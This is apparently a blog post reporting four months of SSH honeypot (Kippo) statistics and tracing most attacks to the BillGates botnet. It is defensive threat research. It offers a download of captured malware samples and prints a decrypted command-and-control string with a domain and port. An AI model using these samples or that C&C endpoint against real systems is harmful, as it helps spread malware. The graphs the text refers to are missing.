Inside a Kippo honeypot: how the billgates botnet spreads

A few months ago I decided to install a honeypot to find some new threat and to collect some new malware to be analyzed. There are several honeypot I had in mind to try, but for now I have chosen Kippo.

From the Kippo’s homepage: “Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.” (To see all the features offered by this honeypot consult the Kippo’s homepage)

I will not dwell talking about the installation and the features which Kippo offers because this post is intended to be a final report with statistics and graphs only after months in operation. Regarding configuration tip&tricks that I have used, here there are some links that will be very helpful in setting up a similar setup:

My honeypot is a sort of ‘fork’ of original Kippo from desaster Github repo, in which I have merged some changes to hide or improve Kippo itself. That is: improvements like sftp, direct-tcp, exec stdin logging, ssh algorithm update, json logging, etc from Michel Oosterhof Kippo fork, all extra commands from kippo-extra github repo, and some minor changes. Then I applied a few workarounds/patches to hide my Kippo honeypot from each identification attempt.

The honeypot is located in Singapore and it was turned on 1st September 2014 and stopped 31 December 2014, so I have collected 4 months of data, during which, except for some occasional visit from someone who was playing with nmap, I received substantially attacks from a very specific botnet on which I will spend a few words at the end of the post.

Data, like connections, downloads, command inputs, etc, are saved in a database and thanks to the Kippo-Graph script from Bruteforce lab, can be viewed very comfortably via browser.

Now let’s get into the statistics.

Honeypot activity

Success ratio

Total login attempts is 112467but how many ofthesehave been successful?

Just under 4% success login. But why? Let’s see Username and Passwors used to login into SSH.

OK, strange User/Password combinations have been used, probably that’s the result of a dictionary based script used by the botnet. Clearly the most common attempt, 46% of the total, has been done usingroot/admin. In fact 3644 is very close to the number of successful logins.

Now let’s see what is the SSH Client used to try to login on the honeypot.

Top 10 SSH clients

Putty stands out pretty well.

Let’s now analyze the human activity performed on the honeypot.

Top 10 commands

Not many sessions have been interactively used by an operator (maybe they found out they were playing on a honeypot?), just 39 sessions have been recorded.

The large amount of data recorded from the honeypot refer to a very specific botnet: the BillGates botnet. I came to this conclusion after analyzing the IP and samples captured by Kippo and after doing some research with Google. Here you can download the latest fresh samples captured by Kippo (30 December). (password: infected)

I uploaded just one copy of eachfile since there were a lot of duplicates. See below:

I preferrednot to publishanyfile analysisbecause there isenough information online, particularly on Kernelmode Forum there are very interesting information and links, the same informations that I’ve found by analyzing the various modules. The only thing that varies is the C&C IP address obviously (dead at moment) and some minor code changes. In any case some modules were packed with UPX, so I’ve already unpacked them. These modules are the botnet’s modules (originally named atddd and cupsdd(h), names usually differ from the version to version).

Below some info gathered from botnet main module cupsdd(h):

The string decrypted with RSA algorithm is:

v9.jack52088.com:5168:1:1: :1:698412:697896:697380

in which, after split operation, have been assigned to these parameters:

If you want to do more analysis, my version now also includes a logstash parser so you can enrich with GeoIP and load into ElasticSearch and use Kibana for graphs.

Did you find anything else interesting besides BillGates? Latest interesting findings I have are something connecting to French sites with direct-tcpip, which I don’t understand yet and something looking for ‘ubnt’ (ubiquity networks) wifi access points.

About billgates botnet and connection to French sites I don’t know honestly. I analyzed only a couple of samples (the last captured) to understand better what I had in hands, but not whole samples (about 10GB).
BTW, they are about 3 weeks I’ve turned off the server because I’m moving around so I’m losing the latter attacks/samples.